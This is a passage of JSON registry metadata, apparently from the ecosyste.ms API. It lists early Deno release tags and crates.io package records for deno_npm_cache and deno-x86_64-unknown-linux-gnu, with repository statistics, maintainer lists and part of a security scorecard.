g_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T20:50:24.755Z","dependent_packages_count":0,"downloads":53054,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.51081861542895,"dependent_repos_count":24.23734495474355,"dependent_packages_count":32.15060783033682,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.63292380016977},"purl":"pkg:cargo/deno_npm_cache","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_npm_cache","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_npm_cache","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_npm_cache/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_cache/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_cache/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_cache/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_cache/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_cache/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_cache/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2024-12-06T00:08:41.930Z","updated_at":"2024-12-06T00:08:41.930Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2024-12-03T00:35:01.112Z","updated_at":"2024-12-03T00:35:01.112Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047998,"name":"deno-x86_64-unknown-linux-gnu","ecosystem":"cargo","description":"Binary dependencies for the 'deno' crate","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":33,"first_release_published_at":"2019-03-31T00:12:26.636Z","latest_release_published_at":"2019-11-15T18:18:35.101Z","latest_release_number":"0.24.0","last_synced_at":"2026-08-29T21:57:10.240Z","created_at":"2022-04-12T10:03:14.821Z","updated_at":"2026-08-29T21:57:10.240Z","registry_url":"https://crates.io/crates/deno-x86_64-unknown-linux-gnu/","install_command":"cargo install deno-x86_64-unknown-linux-gnu","documentation_url":"https://docs.rs/deno-x86_64-unknown-linux-gnu/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: 